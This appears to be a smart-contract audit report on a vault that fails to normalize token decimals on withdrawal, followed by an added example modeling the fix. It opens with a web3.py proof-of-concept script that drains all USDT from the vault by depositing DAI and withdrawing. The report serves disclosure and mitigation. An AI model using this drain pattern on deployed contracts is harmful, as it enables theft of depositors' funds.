This is the web3.py script to drain all usdt from the vault.

```python
# Assumes `usdt`, `dai` and `vault` are web3.py contract objects and
# `user` is the caller's address; their setup is not shown in the report.
usdt_balance = usdt.functions.balanceOf(vault.address).call()
print('previous usdt:', usdt_balance)
# We deposit some margin dai to drain all liquidity.
deposit_amount = usdt_balance + usdt_balance
dai.functions.approve(vault.address, deposit_amount).transact()
vault.functions.deposit(dai.address, deposit_amount).transact()
print('amount of share:', vault.functions.balanceOf(user).call())
vault.functions.withdrawAll(usdt.address).transact()
# The usdt left in the vault would be zero.
print('usdt left:', usdt.functions.balanceOf(vault.address).call())
```
Handle
jonah1005
Vulnerability details
Impact
The vault does not normalize decimals when a user withdraws the token. When a user has 100e18 shares, he can withdraw all usdc/usdt from the token.
The liquidity of USDC/USDC would be drained. I consider this a high-risk issue.
Proof of Concept
Vault.sol#L232-L261
Tools Used
None
Recommended Mitigation Steps
Normalize decimals on withdrawing.
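
The arithmetic behind the recommended mitigation, as an added example that is not part of the original report or the project's code. It assumes a simplified model in which shares use 18 decimals and are worth 1:1 of normalized value; the function names and the vault balance are constructed for illustration.

```python
# Simplified model (assumption): shares use 18 decimals and are worth 1:1 of
# normalized value. The real Vault.sol share-price math is not reproduced here.
SHARE_DECIMALS = 18
DECIMALS = {"DAI": 18, "USDT": 6}  # standard decimals of these tokens


def to_share_units(token, raw_amount):
    """Scale a raw token amount up to 18-decimal share units (deposit side)."""
    return raw_amount * 10 ** (SHARE_DECIMALS - DECIMALS[token])


def to_token_units(token, share_amount):
    """Scale 18-decimal share units down to the token's own decimals."""
    return share_amount // 10 ** (SHARE_DECIMALS - DECIMALS[token])


def payout(token, shares, vault_balance_raw, normalize):
    """Raw token amount paid for `shares`, capped at the vault's balance."""
    amount = to_token_units(token, shares) if normalize else shares
    return min(amount, vault_balance_raw)


def demo():
    usdt_in_vault = 1_000_000 * 10**6    # constructed: 1,000,000 USDT (6 decimals)
    dai_deposit_raw = 2 * usdt_in_vault  # same sizing as the PoC deposit
    shares = to_share_units("DAI", dai_deposit_raw)
    return {
        "deposit_value_dai": dai_deposit_raw / 10**18,
        "unnormalized_usdt_raw": payout("USDT", shares, usdt_in_vault, False),
        "normalized_usdt_raw": payout("USDT", shares, usdt_in_vault, True),
    }


if __name__ == "__main__":
    print(demo())
```

Without normalization the payout is capped only by the vault's entire USDT balance; with it, the payout matches the value of the deposit that minted the shares.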